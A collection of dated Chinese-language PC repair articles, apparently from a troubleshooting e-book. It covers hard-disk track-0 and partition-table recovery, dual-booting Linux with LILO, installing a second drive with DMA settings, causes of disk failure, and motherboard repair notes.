    其实0磁道损害也是坏道的问题，只不过关键的0磁道也有坏道而已。此时，我们所要做的就是重新标记0磁道的位置。这项工作我们可以交给PCTools 9.0工具包，我们要利用的是其中的DE.EXE命令。为了修改0磁道文字，首先要去掉DE的只读属性，我们必须把Configuration下Read Only前的钩消去。随后在主菜单Select中进入Drive type，并选择下一级的Physical→Hard disk。回车之后，我们的主菜单就会出现Partition Table（分区表），注意找Beginning Cylinder（起始柱面）这一项，它代表硬盘的0柱面开始，也就是0磁道的位置。此时大家只要稍微动一下，把它改为1或者2即可。

    需要说明的是，这里的数值不能随意改动，一旦改动幅度太大，BIOS就不能正确识别硬盘。但是问题是万一改动后的位置仍然是有坏道的怎么办？呵呵，我目前也想不出办法，希望有机会大家可以探讨一下。如果运气不算太坏的话，那么我们接着就可以采用隐藏坏道的方法来进行分区格式化处理了。


在第二硬盘上安装Linux

《一键清理系统垃圾》

在第二硬盘上安装Linux

    在主硬盘空间不足或不想更改硬盘分区的情况下，我们都很想把Linux安装到第二个硬盘上。一般而言，安装Linux时，系统如果不安装在主硬盘上，就需要做一些特殊的工作。这里介绍一个仅使用LILO启动器就可以让原来主硬盘上的Win98和第二硬盘上的Linux“和平共处”的方法。
    以我的系统为例，硬件配置和软件环境如下：
    赛扬400/钻石I810主板/64MB内存/15英寸彩显/40×光驱/双硬盘。
    硬盘一：希捷8.4GB全部空间已经分成FAT32分区，安装了Win98操作系统。
    硬盘二：希捷3.2GB前500MB空间已经分为FAT32分区，剩余为自由空间。
    软件：RedHat 6.0
    需要达到的要求：Linux安装在二号硬盘，机器从一号硬盘启动（主盘），启动时可以自由切换选择操作系统Win98和Linux。
    下面是安装步骤：
    1.准备工作
    打开机箱，把一号硬盘的硬盘线拔下来。（必须拔下来，因为即使在BIOS里面把主硬盘屏蔽掉，Linux照样可以发现它，这样将造成安装失败）配置好机器，在BIOS里面设置成光盘首先启动。
    2.第一次安装
    由光盘启动，在二号硬盘上安装Linux。如果二号硬盘和一号硬盘共用数据线，且使用主板的IDE1接口，那么在安装时，硬盘将被认成“hdb”。如二号硬盘和光驱共用数据线，且使用主板的IDE2接口，硬盘可能就会被认成“hdc”。
    需要注意的是，在安装LILO时，不能把它安装在“Master Boot Record”，必须安装在“First Sector of Boot Partition”。目的是为了将来由主盘上的LILO调用二号硬盘的Linux分区启动指令。
    安装完成后，关闭计算机电源。这时是启动不了硬盘上的Linux的。如果强行启动，就会出现死循环或者死机状态。
    3.设置LILO
    重新接好一号硬盘，仍然由光盘启动计算机。这时，在安装Linux时，在出现的“install”、“upgrade”选项里面选择后者。其实就是为了在一号硬盘重新安装LILO，让其调用已经设置好的Linux启动分区。
    在安装LILO时，会出现一号硬盘的标识“hda”。
    /dev/hda Master Boot Record
    ……
    这次要把LILO安装在hda的主引导记录Master Boot Record上。完成此步后，会出现启动设置的选项。机器把主硬盘上的Win98和刚才安装的Linux罗列出来，要求你选择可以启动的系统，把其他一些选项配置好后完成安装。至此，大功告成。
    编后：此法特别适合Linux初学者，因为用这种方法安装的Linux和Win98彼此隔离开来，非常便于对各个系统的维护。以后，如果第一硬盘上的Win98崩溃，格式化C盘重装后，可以再重装LILO恢复双启动；如果第二硬盘上的Linux崩溃，可以用Win98启动盘引导系统后再执行fdisk /mbr命令重写主引导记录，即可轻松去除LILO，令第一硬盘上的Win98系统完好无损。


造成硬盘毁灭性故障的错误及操作

《一键清理系统垃圾》

造成硬盘毁灭性故障的错误及操作

    本文要叙述的是会造成硬盘毁灭性故障的错误及操作，不是一般的磁盘和系统错误。这些故障通常没有先兆，一旦出现，在BIOS里也不能认出硬盘，硬盘数据挽回的可能性极小，此所谓硬盘之大敌。

    一般地，现在的硬盘都加入了S.M.A.R.T的自动侦测技术，以便让用户能在致命的故障出现前看到先兆，备份好数据——但这都是针对正常操作情况下设计的，如果用户的使用方法如下所列，故障的出现将可能是无先兆的，也就是突然死亡。

    一、在开机和关机的时候突然强行切断电源

    现在的电源及主板的ATX设计，普遍实现了软关机的功能。这种设计让人倍感方便。但是软关机要先完成一系列的关闭正在运行的程序的操作，加上各种操作系统及各主板厂家设计上的兼容性、BUG，Windows在进行关闭应用程序然后切断电源的时候经常会出现死机，大家可能在很多论坛及报刊的问答专栏里，都见过问“为什么在软关机的时候死机”的问题——此时硬盘的复位动作很可能还没完成，如果用户采用强行切断电源的做法，硬盘物理受损的可能性很大。

    正确的做法：如果在软关机时候出现死机，应该是按RESET键，让系统重新进入Windows后，再正式完成关机操作——这样可能会繁琐一点，但是能保证硬盘安全地复位，对你上千元的硬盘来说，安全第一啊。

    还有就是开机的时候进行的切断电源：在正常状态下当然没人会做这么无聊的操作，但是当出现一些诸如显示卡或是内存没插好、视频线松了的情况，导致电脑开机无显示的时候，很多人就只埋头于搞定看到的问题，频繁的开机、关机，插拔板卡，再开机......而没留意硬盘在一次次电源的开关下吱吱的呻吟——尤其是开机没显示，只有几秒钟的时间，硬盘的初始化动作还没完成，磁头正处于敏感位置，一下子被切断电源停机，然后在不到10秒钟的情况又受到电流冲击，发生故障的机率会大大增加。

    建议正确的做法：先把硬盘的电源线拔掉，你怎么玩都可以。故障排除后，再接也不迟啊。

    二、对分区进行的误操作

    这的确是新手的错误居多了——Windows的各种版本造成FAT16、FAT32、NTFS各种格式的存在，不同的任务导致各菜鸟蠢蠢欲动经常想变换分区格式。现在GHOST和PQ分区大师都能对分区进行随心所欲的操作，以调整分区的大小、格式，尤其是后者还具有格式化分区、隐藏分区的功能。对熟悉操作的人来说，这些工具是让人得心应手；但对于新手来说，对分区的操作应该特别谨慎。因为分区的错误虽然是软故障，不是物理故障，但是如果胡乱操作出错后，在没有弄懂基本概念的情况下，不假思索地进行“恢复”操作的话，可能会导致分区的引导区和分区表过于混乱无法再被任何工具软件识别——如果你没有分区表和硬盘引导区数据备份的话，嘿嘿，就只好低级格式化了——低级格式化的工具使用也有个熟练和懂行与否的问题，由于对分区进行误操作导致新硬盘不能再使用的案例，我见过不少。

    建议的措施：无论您是老鸟还是新手，在对硬盘进行敏感操作的时候，备份好分区表和引导区数据，出错的时候就能随时正确恢复了。新手最好请个师傅，先带一带，熟悉了软件的界面和指令后再自己操作，毕竟硬盘不同于其他配件，里面有你的宝贵数据哦。

    三、Windows的初始化及使用过程中的危险习惯操作

    Windows在初始化的时候，是较为敏感和危险的时刻，如果用户在启动组里加载了太多的东西，Windows的初始化就会耗费大量时间，也可能会造成死机——尤其是因为害怕病毒而加载了2个以上防火墙、或是在线监控病毒软件的用户，各杀毒软件之间的冲突机率很大。

    另外，Windows系列提供了用TAB+ALT键切换各应用程序的功能，尤其是能在DOS窗口下切换回Windows界面，方便了要在旧的应用程序下工作的用户。但是因为DOS是单线程的操作系统，其应用程序也是基于这种线程的设计，所以DOS的应用程序对CPU的占用率较大，因为DOS老架构的问题，程序的反应也没Windows程序快，所以在进行Windows的DOS窗口操作的时候，建议用户的动作不要那么快，以免系统响应不及造成死机；另外，使用TAB+ALT切换的时候也应该谨慎，不要在程序还没完成当前的任务就强行切换，造成死机。

    Windows中的错误，本来不会直接造成硬盘的物理损坏。但是这些是属于使用习惯的问题，一两次无所谓，天长日久，频繁的死机和重启动，对硬盘乃至电脑的各个配件的冲击积累起来是相当有害的；而且频繁死机容易造成人的心理急躁，可能会在电脑重新启动完成前就赌气关机，也就是出现第一种类型的致命故障的可能性。 还有就是各种各样不退出Windows程序就随手关机、长期不整理硬盘和不运行磁盘扫描程序（在一些公用的计算机最常见）等等的不良习惯，都可能会埋下硬盘毁灭的根源。

    建议的措施：这些都是基本的东西，注意改变使用习惯就是，比如在线防杀毒软件，挂一个即可，可以定期变换其他的，但同时后台运行的不适宜太多。其他标准正确的操作在很多经验文章里都有提及，此处不多说了。

    四、其他各类非常规错误

    比如数据线插反、劣质的电源导致的损坏、板卡的短路等等，在各类报刊网站有很多案例，此处不一一列举了，自己注意就是。

    总结：上面所说的硬盘大敌，不一定是如此操作后马上出现故障，但是存在相当高的损坏机率——你今天还玩游戏上网好好的，随手关机后，明天没有任何提示，系统找不到硬盘了。请大家对照自己的做法，注意改进，维护硬盘用临时抱佛脚、出了问题再想办法的态度是很危险的，除非你的运气永远那么好。


拯救硬盘故障10绝招(二)

《一键清理系统垃圾》

拯救硬盘故障10绝招(二)

    6.DOS引导系统引起的启动故障

    DOS引导系统主要由DOS引导扇区和DOS系统文件组成。系统文件主要包括iosys、msdos.sys、command.com，其中command.com是DOS的外壳文件，可用其他的同类文件替换，但缺省状态下是DOS启动的必备文件。在Windows 95携带的DOS系统中，msdos.sys是一个文本文件，是启动windows必须的文件。但只启动DOS时可不用此文件。如果DOS引导出错，可从软盘或光盘引导系统，之后使用sys c:传送系统即可修复故障，包括引导扇区及系统文件都可自动修复到正常状态。

    7.FAT表引起的读写故障

    fat表纪录着硬盘数据的存储地址，每一个文件都有一组连接的fat链指定其存放的簇地址。fat表的损坏意味着文件内容的丢失。庆幸的是DOS系统本身提供了两个fat表，如果目前使用的fat表损坏，可用第二个进行覆盖修复。但由于不同规格的磁盘其fat表的长度及第二个fat表的地址也是不固定的，所以修复时必须查找其正确位置。一些工具软件，如NU等本身具有这样的修复功能，使用也非常的方便。采用debug也可实现这种操作，即采用其m命令把第二个fat表移到第一个表处即可。如果第二个fat表也损坏了，则无法把硬盘恢复到原来的状态，但文件的数据仍然存放在硬盘的数据区中，可采用chkdsk或scandisk命令进行修复，最终得到*.chk文件，这便是丢失fat链的扇区数据。如果是文本文件则可从中提取并可合并完整的文件，如果是二进制的数据文件，则很难恢复出完整的文件。

    8.目录表损坏引起的引导故障

    目录表记录着硬盘中文件的文件名等数据，其中最重要的一项是该文件的起始簇号，目录表由于没有自动备份功能，所以如果目录损坏将丢失大量的文件。一种减少损失的方法也是采用上面的chkdsk或scandisk程序的方法，从硬盘中搜索出chk文件，由目录表损坏时是首簇号丢失，在fat为损坏的情况下所形成的chk文件一般都比较完整的文件数据，每一个chk文件即是一个完整的文件，把其改为原来的名字可恢复大多数文件。

    9.误删除分区时数据的恢复

    当用fdisk删除了硬盘分区之后，表面现象是硬盘中的数据已经完全消失，在未格式化时进入硬盘会显示无效驱动器。如果了解fdisk的工作原理就会知道，fdisk只是重新改写了硬盘的主引导扇区(0面0道1扇区)中的内容。具体说就是删除了硬盘分区表信息，而硬盘中的任何分区的数据均没有改变，可仿造上述的分区表错误的修复方法，即想办法恢复分区表数据即可恢复原来的分区即数据，但这只限于除分区或重建分区之后。如果已经对分区用format格式化，在先恢复分区后，在按下面的方法恢复分区数据。

    10.误格式化硬盘数据的恢复

    在DOS高版本状态下，格式化操作format在缺省状态下都建立了用于恢复格式化的磁盘信息，实际上是把磁盘的DOS引导扇区，fat分区表及目录表的所有内容复制到了磁盘的最后几个扇区中(因为后面的扇区很少使用)，而数据区中的内容根本没有改变。这样通过运行"unformat c:"即可恢复原来的文件分配表及目录表，从而完成硬盘信息的恢复。另外，DOS还提供了一个miror命令用于纪录当前的磁盘的信息，供格式化或删除之后的恢复使用，此方法也比较有效。


拯救硬盘故障10绝招(一)

《一键清理系统垃圾》

拯救硬盘故障10绝招(一)

    每个用户的硬盘中都存放着大量的数据，而硬盘又是一个易出毛病的部件。为此，除了有效地保存硬盘中的数据，经常备份以外，还要学会在硬盘出现故障时如何救活硬盘，或者提取其中的有用数据，把损失降到最小程度。

    1.系统不承认硬盘

    此类故障比较常见，即从硬盘无法启动，从A盘启动也无法进入C盘，使用CMOS中的自动监测功能也无法发现硬盘的存在。这种故障大都出现在连接电缆或IDE口端口上，硬盘本身的故障率很少，可通过重新插拔硬盘电缆或者改换IDE口及电缆等进行替换试验发现故障的所在。如果新接上的硬盘不承认，还有一个常见的原因就是硬盘上的主从跳线，如果硬盘接在IDE的主盘位置，则硬盘必须跳为主盘状，跳线错误一般无法检测到硬盘。

    2.CMOS引起的故障

    CMOS的正确与否直接影响硬盘的正常使用，这里主要指其中的硬盘类型。好在现在的机器都支持"IDE auto detect"的功能，可自动检测硬盘的类型。当连接新的硬盘或者更换新的硬盘后都要通过此功能重新进行设置类型。当然，现在有的主板可自动识别硬盘的类型。当硬盘类型错误时，有时干脆无法启动系统，有时能够启动，但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量，则硬盘后面的扇区将无法读写，如果是多分区状态则个别分区将丢失。还有一个重要的故障原因，由于目前的IDE都支持逻辑参数类型，硬盘可采用Normal、LBA、Large等。如果在一般的模式下安装了数据，而又在CMOS中改为其他的模式，则会发生硬盘的读写错误故障，因为其物理地质的映射关系已经改变，无法读取原来的正确硬盘位置。

    3.主引导程序引起的启动故障

    硬盘的主引导扇区是硬盘中的最为敏感的，其中的主引导程序是它的一部分，此段程序主要用于检测硬盘分区的正确性，并确定活动分区，负责把引导权移交给活动分区的DOS或其他操作系统。此段程序损坏将无法从硬盘引导，但从软驱或光驱可对硬盘进行读写。修复此故障的方法较为简单，使用高版本DOS的fdisk最为方便，当带参数/mbr运行时，将直接更换(重写)硬盘的主引导程序。实际上硬盘的主引导扇区正是此程序建立的，fdisk。exe之中包含有完整的硬盘主引导程序。虽然DOS版本不断更新，但硬盘的主引导程序一直没有变化，所以只要找到一种DOS引导盘启动系统并运行此程序即可修复。另外，像KV3000等其他工具软件也具有此功能。

    4.分区表错误引导的启动故障

    分区表错误是硬盘的严重错误，不同的错误会造成不同的损失。如果是没有活动分区标志，则计算机无法启动。但从软驱或光驱引导系统后可对硬盘读写，可通过fdisk重置活动分区进行修复。如果是某一分区类型错误，可造成某一分区的丢失。分区表的第四个字节为分区类型值，正常的可引导的大于32MB的基本DOS分区值为06，而扩展的DOS分区值是05。如果把基本DOS分区类型改为05则无法启动系统，并且不能读写其中的数据。如果把06改为DOS不识别的类型如efh，则DOS认为改分区不是DOS分区，当然无法读写。很多人利用此类型值实现单个分区的加密技术，恢复原来的正确类型值即可使该分区恢复正常。

    分区表中还有其他数据用于纪录分区的起始或终止地址。这些数据的损坏将造成该分区的混乱或丢失，一般无法进行手工恢复，唯一的方法是用备份的分区表数据重新写回，或者从其他的相同类型的并且分区状况相同的硬盘上获取分区表数据，否则将导致其他的数据永久的丢失。在对主引导扇区进行操作时，可采用NU等工具软件，直接对硬盘主引导扇区进行读写或编辑。当然，也可采用debug进行操作，但操作繁琐并且具有一定的风险。

    5.分区有效标志错误引起的硬盘故障

    在硬盘主引导扇区中还存在一个重要的部分，那就是其最后的两个字节:55aah，此字为扇区的有效标志。当从硬盘，软盘或光驱启动时，将检测这两个字节，如果存在则认为有硬盘存在，否则将不承认硬盘。此标志时从硬盘启动将转入rom basic或提示放入软盘。从软盘启动时无法转入硬盘。此处可用于整个硬盘的加密技术。可采用debug方法进行恢复处理。另外，DOS引导扇区仍有这样的标志存在，当DOS引导扇区无引导标志时，系统启动将显示为:"missing operating system"。其修复的方法可采用的主引导扇区修复方法，只是地址不同，更方便的方法是使用下面的DOS系统通用的修复方法。


拯救硬盘数据简单易行

《一键清理系统垃圾》

拯救硬盘数据简单易行

《中国电脑教育报》高光

    大家知道，当系统的分区表受到病毒和其他原因破坏时，要恢复是比较麻烦的。近日，笔者就用两款硬盘分区工具拯救了一个硬盘的数据。

    故障现象：

    一日我的主机电源指示灯闪烁不停，于是重启电脑在MS-DOS方式下进入C盘，但查看目录时不能正常读出目录列表，其他D、E、F盘正常。拆下硬盘并安装在其他电脑上，该硬盘的分区C盘仍不能读取。笔者用工具软件查看，发现C盘0磁道部分出现坏道。更要命的是，请来的专家用FDISK命令删除了硬盘上所有的分区！由于电脑内存有许多重要的资料，而且没有备份，数据一旦丢失将不堪设想。为此，我在网上下载了DiskMan 1.20 Beta 3和SPFDISK两个硬盘维护软件。这两款软件体积非常小，可是功能却非常强大（需要注意的是这两个软件必须运行在真正的DOS模式下）。

    故障排除：

    1. 运行DISKMAN程序，进入“工具”菜单，选择其中的“重建分区表”功能进行分区，目的是看能不能恢复此硬盘的分区表。运行后出现提示：“请选择自动方式和交互方式”。我选择“自动方式”，结果正常恢复了此硬盘的分区表。存盘后退出程序并重启电脑。用启动盘启动后，发现此硬盘的D、E、F盘的数据均能正常读出，但C盘的数据仍然不能被读取。

    DISKMAN使用界面

    2. 运行SPFDISK程序，将光标停留在分区表C盘，按屏幕提示按Tab键，待出现菜单后，选择每三项“硬盘表面测试”，执行后检测到0磁道已经损坏，按Esc键中断退出。依照屏幕提示按下回车键，出现菜单。选择“DOS工具”项，回车进入下一个菜单，再选择C项（拷贝FAT1到FAT2），拷贝完成后存盘。这事再用SPEDISK程序中的“硬盘表面测试”功能测试，发现0磁道位置已转移。然后退出程序，用Windows 98启动软盘重新启动电脑，进入C盘后发现C盘的数据可以正常读取了。利用SYS C：命令向C盘传输系统文件并重启后，Windows 98也能正常运行了。

    经过上述两个步骤，硬盘的数据已经完全正常。菜鸟总结这次经验，认为只要硬盘没有进行格式化，一般用DISKMAN程序都能恢复分区表。但如果硬盘0磁道损坏，用SPFDSIK修复是最好的选择。


正确安装双硬盘/双光驱

《一键清理系统垃圾》

正确安装双硬盘/双光驱

    加装一块大肚硬盘或高速光驱，成为不少电脑玩家近来的实际行动。在实际安装中笔者遇到了一些问题，同时与身边的朋友们交流也积攒了一些经验，在这里就想把它们拿出来与大家分享，希望对想装机的朋友们有所帮助。
    一、安装双硬盘/双光驱的前提
    首先要有新增设备的空间。硬盘与光驱都是IDE接口的设备，而现在的电脑内一般都有2个EIDE接口，最大可接两根双插头的40芯硬盘线来挂4块IDE兼容设备。因此，如果你在电脑内没有增加过其它IDE接口设备的话，应有足够的空间留给第二个硬盘或光驱。
    其次要当心机箱内电源功率大小。由于不少老式机内所提供的电源输出功率往往只有200W左右，再加上有不少人购机后又自行装上了其它一些新设备，如VOODOO类显卡（笔者就是）、网卡、内置MODEM等等，所以满负荷的老电源能否再为新硬盘或光驱提供足够的输出功率就很值得怀疑了。可别小看这个问题，它带来的后果轻则死机，重则会使你的硬盘或光驱提前光荣"退休"。因此，笔者认为最好把你的电源换成230W以上。
    最后要注意你的主板BIOS是否支持Ultra DMA设备。因为现在的大肚硬盘和高速光驱都已完全支持Ultra DMA标准。而要想发挥出它们速度快的优势，必须得到主板有效的支持。按理说，Ultra DMA标准都已出来两年多了，现在的主板当然是没问题的了。但一些玩家限于条件还在使用一些老主板，如HX、FX、VX及部分TX板就不支持Ultra DMA标准。这样一来即使装上了新硬盘或光驱，也只能降级工作在PIO MODE3或PIO MODE4模式下，发挥不出DMA模式传输数据快的优势。所以，对于能够且有条件把主板BIOS升级的玩家，一定要升一下级再安装。
    二、安装前的正确规划及跳线设置
    为了能发挥出支持Ultra DMA模式的大肚硬盘和高速光驱速度快的优势，在安装时应尽量把它们与老设备（不支持DMA模式）分开，接在不同的IDE接口上（即不共用同一根硬盘线）。可分以下二种情况：
    ① 加装第二光驱：可让新光驱单接一个IDE接口，而把原硬盘和老光驱共用另一个IDE接口，并把原硬盘设为主盘，老光驱设为从盘。（具体设置方法可参看硬盘或光驱面板上所印说明文字或图形）
    ② 加装第二硬盘：可让新硬盘单接一个IDE接口，而让原光驱和老硬盘共用另一个IDE接口，并把原光驱设为主盘，老硬盘设为从盘。
    如果你的老设备都支持DMA模式，那么非常好办：你只需把两块硬盘或光驱接在同一个IDE接口上，而让剩下的一个光驱或硬盘单占另一个IDE接口就行了。至于在同一个IDE接口上把哪块硬盘或光驱设为主盘或从盘，就全凭个人喜好了。不过一般都是把速度快的设备设为主盘的。
    三、安装工作及相关BIOS设置
    固定好正确设过跳线的新硬盘或光驱后，插上电源线和数据线。一般不会插错，因为电源线接头部分往往被设计为特殊形状，错了是插不进去的。而数据线（硬盘线）一侧上有颜色标记（黑或红色），同时接口处又有数字1或小三角标志，因此只要两处对上就绝不会插错。此外，对于安装第二光驱的用户，连接光驱和声卡的音源线可以拔下来用新光驱取而代之。做完这些后，上紧螺丝就可加电进行CMOS有关项目的设置了。设置如下：
    ①"INTEGRATED PERIPHERALS"设置。如果主板BIOS支持DMA模式，在这里就会有几项相关项："IDE Primary/Secondary/Master/Slave Ultra DMA"，可把它们都设成"AUTO"，让主板自动检测硬盘或光驱是否工作在DMA模式下并进行相应设置。如果主板不支持DMA模式，这一步可免做，不过在安装完新硬盘或光驱就只能工作在PIO MODE下了。
    ②"IDE HDD AUTO DETECTION"设置。该项可用来检测新老硬盘各项参数，并用笔记下来。
    ③"STANDARD CMOS SETUP"设置。在该项设置中将TYPE（接口类型）设为"User"（用户），然后填入刚才记下来的参数，就可正确设定好新老硬盘的工作模式。也可把TYPE设为"AUTO"，让主板自动设置，不过这样会影响将来电脑启动速度。
    设好后，按"F10"或选择"SAVE＆EXIT SETUP"保存设置。退出CMOS后重启电脑，就可进入WINDOWS系统进行相关设置了。
    四、 安装后在操作系统中进行调试
    由于WINDOWS支持新设备的即插即用，所以一般来说，新设备都能被正确识别。新硬盘是不用说了，即使是新光驱，往往也不用再装驱动程序就可在WINDOWS下正常使用，当然如果准备在纯DOS下用它，就还需安装一下带来的原驱动程序了。但是能正常工作并不代表已发挥出新设备的潜力。所以有必要在WINDOWS中进行有关设置。不过，对于主板不支持DMA模式的玩家来说，这以下几步就可全省了。
    对于用WIN98的玩家来说，由于WIN98已内置了对Ultra DMA的支持，所以设置起来异常简单：只要进入"开始"-"设置"-"控制面板"-"系统"-"设备管理"中，找到新添的硬盘或光驱，双击打开，再点"设置"，在其中的"DMA"选项上打个钩，再按提示重启就行了。
    对于用WIN95 OSR2的玩家来说，设置起来就相对麻烦一些。因为必须安装主板厂商提供的Bus Master驱动程序来给WINDOWS系统打个补丁，系统才能提供对Ultra DMA的良好支持。（不过操作前应先备份注册表和CONFIG.SYS及AUTOEXEC.BAT文件，以防不测）
    具体步骤如下：（以一块联讯TX430板为例）
    ① 插入随主板带来的含Bus Master驱动程序软盘。双击执行SETUP或INSTALL文件（具体因盘而异），然后依提示删除CONFIG.SYS和AUTOEXEC.BAT中所有的实模式IDE设备驱动程序（多为光驱驱动程序），选择YES后开始拷贝文件，完成后重启。
    ② 重启后出现构造新硬件信息。并依提示选中驱动程序将要存放的路径：C：\WINDOWS\SYSTEM\IOSUBSYS，拷入程序后，依次安装完"Primary Bus Master IDE controller"、"Secondary Bus Master IDE controller"，再次重启，系统自动构造驱动程序信息，安装完成。
    下面所做工作与在WIN98中一致，找到相应的"DMA"选项并打上钩，重启电脑即可享受一下DMA模式所带来的速度提升感了。
    要当心的是：由于Bus Master驱动程序接管了所有IDE接口设备的驱动，所以极有可能导致原来的老硬盘或老光驱（不支持Ultra DMA模式）工作不正常甚至"失踪"，这时可以通过修改注册表，来让WINDOWS用自带的标准IDE硬盘驱动程序部分替换掉到Bus Master驱动程序。方法如下：
    在"开始"菜单中选"运行"对话框，在其中键入"REGEDIT"并回车来启动注册表编辑器。在左边窗口中点击"HKEY－LOCAL－MACHINE/SYSTEM/CURRENTCONTROLSET/SERVICES/CLASS/HDC"，逐一打开它的四个分支"0000、0001、0002、0003"，下面的修改就要根椐你老硬盘或光驱所占IDE接口位置而定了。
    如果老设备在主IDE接口上（即第一IDE接口），那么找到"DRIVERDESC"项的键值为"PRIMARY IDE CONTROLLER"所在的分支"0003"，左键双击它所包含"PORTDRIVER"图标，在弹出的"编辑字符串"窗口中，把键值改为"ESDI－506.PDR"。（这就是WINOWS默认的IDE 设备驱动程序。）
    如果老设备在副IDE接口上（即第二IDE接口），那么就打开分支键值为"SECONDARY IDE CONTROLLER"所在的分支"0004"，在同样的位置上做同样的修改。确定后，退出注册表编辑器并重启电脑就会一切正常了。　　　　　　　　　　　　　　（淮南 林岭）


主板无法识别硬盘灰尘是凶手

《一键清理系统垃圾》

返回总目录 上一页 目录页

主板无法识别硬盘灰尘是凶手

《中国电脑教育报》石山

    朋友的一台兼容机最近经常无法启动，偶尔能进入系统也是频繁死机，无奈之下只好向本“大师”求援。

    根据朋友述说的故障现象，笔者初步判断为病毒所致或者硬盘本身出现了问题。按照先软后硬、先简单后复杂的检修原则，拿出最新的KV3000杀毒软件准备对硬盘进行查杀，可是用启动盘进入DOS模式后，却提示找不到各驱动器，看来杀毒是无法进行了。

    重启电脑并进入主板BIOS，发现硬盘参数无不当之处，但自动检测却无法识别硬盘。看来只有检查硬件了，打开机箱，将硬盘电源线与数据线拔下重新插好，开机还是无法识别硬盘。难道是硬盘出了问题？将硬盘拆下接到笔者的爱机上，能够正常工作，也就是说硬盘没有问题。难道是数据线坏了？用笔者的数据线把硬盘重新接到故障机，故障依旧。会不会是电源的问题，换上笔者的长城电源，还是无法唤醒硬盘。仔细观察主板，硬盘接在IDE1接口，光驱接在IDE2接口上，光驱能使用为什么硬盘就有问题。试着将光驱拆下，将硬盘接到IDE2接口上，硬盘竟然能正常使用了。邪门，何以IDE2完好而IDE1出故障，它们可是由同一主控芯片控制的啊！

    无奈之下，只好拆下主板进行观察，这时发现其背面有好几处布满了灰尘，其中有一处正好位于IDE1接口的焊点处，堆积的灰尘几乎将焊点覆盖了。将灰尘清理干净，固定好主板，装好各配件，重新启动计算机，顺利地进入了系统，一切恢复正常。

    灰尘是电脑的隐形杀手，堆积的灰尘妨碍了散热，易于损坏元器件，在潮湿天气还会造成电路短路现象。灰尘对计算机的机械部分也有极大的影响。因此，定期给爱机做卫生显得格外重要。


硬盘故障

《一键清理系统垃圾》

返回总目录

硬盘故障

◎1.把两块硬盘，在NT中格式化成一个驱动器盘符。
◎40GB硬盘变20GB了
◎Fdisk的隐藏参数开关
◎Fdisk无法读取硬盘分区
◎Win2000 硬盘/内存完美优化
◎Windows2000硬盘操作小技巧
◎Windows2000中硬盘操作小技巧
◎Windows 98下巧妙隐藏硬盘一法
◎Windows NT4.0硬盘管理入门
◎Windows NT的硬盘管理特点
◎报废硬盘维修实录
◎避免硬盘崩溃困扰的秘诀
◎常见硬盘自举失败的分析
◎从死神手中抢回宝贵的硬盘数据
◎低格能否消除硬盘坏道
◎电极氧化引起的硬盘故障
◎电脑自检找不到硬盘
◎各分区之间的容量能在不损害数据的前提下进行调整吗？
◎给Novell文件服务器加装一个硬盘
◎固定不当引起硬盘故障
◎故障硬盘数据拯救全攻略
◎错接鼠标键盘的故障
◎打开硬盘分区出错
◎解决多硬盘盘符混乱问题
◎解决硬盘坏磁道问题
◎硬盘引导型故障分析及排除
◎解开硬盘逻辑死锁的一种有效方法
◎解析磁盘原碎片整理
◎刻录机只读不写的软故障
◎老主板“软斗”大硬盘
◎老主板安装希捷大硬盘
◎利用DM软件使硬盘再生
◎令维修人员大跌眼镜的硬盘故障
◎拿什么拯救你？我的硬盘！
◎浅谈IDE硬盘常见故障与维护
◎巧用Ghost擦去硬盘坏扇区
◎如何维修硬盘坏道
◎什么叫低格？怎样执行
◎什么样的“坏硬盘”可修复
◎谈谈硬盘出现物理坏道的迹象及修复技巧
◎挽救被损硬盘一例
◎挽救硬盘的几个方法
◎为NetWare服务器添加内存和硬盘
◎我的硬盘会打盹
◎
◎小跳线解决硬盘容量限制
◎修复硬盘坏道
◎一次硬盘数据恢复的经验
◎一分钟教你辨别返修硬盘
◎移动硬盘故障的5种可能
◎硬件复位排故障
◎因磁盘上存在错误而无法安装Windows 98
◎硬盘保护卡安全漏洞及解决办法
◎硬盘编号一点通
◎硬盘不能分区的困惑
◎硬盘
◎硬盘彻底损坏后的数据抢救
◎硬盘彻底损坏后的数据抢救
◎硬盘出现硬件故障，你敢这样维修么？
◎硬盘的常见错误提示及解决方法
◎硬盘的技术术语（二）
◎硬盘的技术术语（一）
◎硬盘灯长亮不息
◎硬盘分区常见问题解决二则
◎硬盘分区技巧二则
◎硬盘各部位常见故障汇总
◎硬盘故障篇
◎硬盘故障问答4例
◎硬盘坏道的发现与修复
◎硬盘坏道修复步步高
◎硬盘坏道修复全攻略
◎硬盘坏道修复全攻略
◎硬盘坏道修复术
◎硬盘零磁道损坏的抢救
◎硬盘零磁道与分区表的修复
◎硬盘启动故障解决方法三则
◎硬盘容量限制问题的形成以及解决方案
◎硬盘软故障的排除
◎硬盘软故障排除的基本知识
◎硬盘软故障排除基本知识及实例
◎硬盘数据恢复经验
◎硬盘维护全攻略
◎处理硬盘物理坏道方法
◎硬盘性能何故偏低？
◎跳出硬盘认识的误区
◎硬盘引导型故障分析及排除
◎用活动硬盘盒巧修硬盘
◎用金山毒霸修复硬盘一例
◎用软件修理硬盘故障
◎用软件修理硬盘故障的“四个绝招”
◎在第二硬盘上安装Linux
◎造成硬盘毁灭性故障的错误及操作
◎拯救硬盘故障10绝招(二)
◎拯救硬盘故障10绝招(一)
◎拯救硬盘数据简单易行
◎正确安装双硬盘/双光驱
◎主板无法识别硬盘灰尘是凶手

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


主板维修精华

《一键清理系统垃圾》

返回总目录 目录页 下一页

主板维修精华

1． BIOS作用：ＢＩＯＳ是开机初始化，检测系统安装设备类型，数量等。
2． RESET的产生过程：ＰＧ→（门电路，南桥）→ＲＥＳＥＴ复位（ＩＳＡ槽Ｂ２脚，ＰＣＩ槽Ａ８脚，ＡＧＰ槽Ｂ４脚，ＩＤＥ的确１脚）
3． CLK产生过程晶振 门电路 南桥 ISA 20脚 PCI 的D8 AGP的D4 OSC 基本时钟
开电就有，直接送到ISA的B30，如没有OSC 则时钟发生器坏
4． 主板不能触发 电源排线的灰线经过一个三极管或门电路（244，245）受IO芯片控制和南桥，再从IO 和南桥到PW—ON
插针。（ATX 电源可以强行短路8脚与地来触发主板）
5． 判断主板的故障时，一定要测CPU 三组电压3.3V 1.5V 2V
RESET,SCLK,内存供电3.3V,是否正常,再看其他的原因.
6． 实时时钟的晶振坏 只是时间不走.
7． CPU旁边的两个大管当不上CPU 时,可能无电压输出,插上CPU,应有3.3V和1.5V给CPU 剩下的2.0V
